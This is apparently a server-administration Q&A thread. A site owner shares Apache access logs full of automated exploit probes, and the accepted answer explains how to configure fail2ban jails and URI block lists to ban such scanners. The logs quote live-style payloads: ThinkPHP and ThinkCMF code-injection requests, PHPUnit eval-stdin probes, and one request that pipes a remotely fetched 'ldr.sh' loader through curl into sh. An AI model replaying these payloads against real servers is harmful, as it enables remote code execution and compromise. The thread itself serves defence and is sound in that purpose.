# Webserver being attacked

Tags: apache-2.2, ubuntu, https, http

my webserver is constantly under attack by attempted use of PHP vulnerabilities and through the use of GET requests. How concerned should I be that I have been compromised and how could I check as some of the requests returned 302 and some returned 200. If I am compromised, what is the best way to keep my current server configuration and removing the unwanted scripts. The examples I am providing are within the last day and this is only a few to give you an idea of how bad the issue is. How should I go about counteracting this? I have fail2ban installed as well. I can provide any additional examples/data you need to help me resolve this issue! Thank you so much in advance!

Some of the access log info:

EXAMPLE 1:

```
     - - [11/Mar/2021:16:24:38 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:38 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:39 +0000] "POST /api/jsonws/invoke HTTP/1.1" 302 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:39 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 302 628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 302 598 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /console/ HTTP/1.1" 302 524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /_ignition/execute-solution HTTP/1.1" 302 560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:41 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:47 +0000] "GET /api/jsonws/invoke HTTP/1.1" 404 9450 "http:///api/jsonws/invoke" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "http:///solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:48 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - [11/Mar/2021:16:24:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 5239 "http://:/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:49 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 9450 "http://:/wp-content/plugins/wp-file-manager/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:49 +0000] "GET /console/ HTTP/1.1" 404 9450 "http://:/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 9450 "http:///index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:50 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 9450 "http:///_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 5239 "http:///?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 - - [11/Mar/2021:16:24:50 +0000] "GET /Autodiscover/Autodiscover.xml HTTP/1.1" 404 9450 "http:///Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:44:50 +0000] "GET / HTTP/1.1" 200 5235 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
```

EXAMPLE 2:

```
- - [11/Mar/2021:00:08:41 +0000] "GET /phpmyadmin/ HTTP/1.1"
This line being spammed over 200 times
```

EXAMPLE 3:

```
- - [11/Mar/2021:12:30:28 +0000] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http:///ldr.sh|sh HTTP/1.1" 200 5041
```

Comment: This happens to any server with a publicly accessible IP address. Consider it a reminder to ensure your various bits of software are regularly updated.

Comment: What is the best action I can do to prevent an attack like this from going through?

Comment: By making sure there are no vulnerable endpoints that would be actually reachable using the URLs attackers are using. Best way for that is to keep all your software updated. Also, remember to have a solid disaster recovery plan with backups, so you can restore from clean backups if server is compromised.

Answer (score 2, accepted):

> I have fail2ban installed

It is not enough to install fail2ban, you have to configure it to fulfill your needs. Fail2ban is just a tool and requires proper usage as many other tools.

To stop "flood" like this you have basically 3 major possibilities:

1. if you are sure your web-page doesn't have basically some broken links it is enough to react on 404 (or some other 40x) response:

```
[bad-http]
logpath = /path/to/your/log
filter =
# fail on every 40x (excepting 401 for authentication attempt, which should be handled separately):
failregex = ^<ADDR> \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true
```

and you must check (and probably correct) the rule causing 302-redirect (probably some white-list for URIs this redirect would affect only).

2. if you cannot be sure or need more precise handling you have to make some block-list URI often used by this bots (or check referrer or some cookie or whatever else), for example:

```
[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (uris starting with this block-list):
_blocklist = vendor|solr|api|\?a=fetch|wp-content|console|\?XDEBUG_SESSION_START=|Autodiscover
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?:%(_blocklist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true
```

Just note that in this case you have to check that URI prefixes in block list don't conflict with your legitimate URIs as well as continuously to maintain this list. Also note that it is very simple for "intruders" to avoid your ban, just changing the URI (for example by adding of some other parameter before your prefix)

3. same as 2. but using white-list of your valid URIs:

```
[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (excepting given white-list):
_whitelist = my-app|other-app
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?!%(_whitelist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true
```

Here you could specify all your valid prefix REs in `_whitelist` to avoid possible false positives for legitimate URIs at all.

No matter what do you use, you can start with large `maxretry` (and short `findtime`) and small value of `bantime` (so avoids too long ban for possible false positive), and if your fail2ban version >= 0.10 with enabled `bantime.increment`, so the recidive evildoers get banned longer and faster later.

Also consider https://github.com/fail2ban/fail2ban/wiki/Best-practice to get some advices how you can configure fail2ban jails and filters more efficiently.